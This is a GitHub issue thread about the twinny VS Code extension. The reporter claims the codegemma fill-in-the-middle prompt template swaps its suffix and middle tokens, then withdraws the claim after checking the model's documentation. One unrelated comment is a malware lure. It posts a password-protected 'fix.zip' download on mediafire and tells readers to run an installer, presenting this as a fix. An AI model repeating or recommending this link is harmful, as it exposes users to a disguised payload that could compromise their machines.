### ISSUE TITLE
FIM template for codegemma is broken

### ISSUE THREAD

**Issue by AndrewRocky** [twinnydotdev/twinny#299]
**Describe the bug**
In Auto-Complete, when using template codegemma <fim_suffix> and <fim_middle> are swapped

**To Reproduce**
My server receives this prompt:
```
PROMPT=                                                                                                                                                                        
<fim_prefix>

''' Language: Python (python) '''
''' File uri: untitled:Untitled-2 (python) '''
import pandas

# my cursor is here -> <fim_suffix>

print("Hello World")<fim_middle>
```
when my cursor is at the end of line with comment.

**Expected behavior**
<fim_middle> and <fim_suffix> should be swapped in prompt template.

**Screenshots**

**Logging**
Rnable logging in the extension settings if not already enabled (you may need to restart vscode if you don't see logs).  Proivide the log with the report.

**API Provider**
oobabooga

**Chat or Auto Complete?**
fim (auto-complete)

**Model Name**
bartowski/codegemma-7b-GGUF

**Desktop (please complete the following information):**
 - OS: Windows 11 remoted into Debian through SSH
 - VSCode 1.92.2
 - Extension Version: v3.15.4

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AndrewRocky** [comment]
I've double checked [their docs](https://huggingface.co/google/codegemma-7b#for-code-completion) - my bad, didn't read carefully.
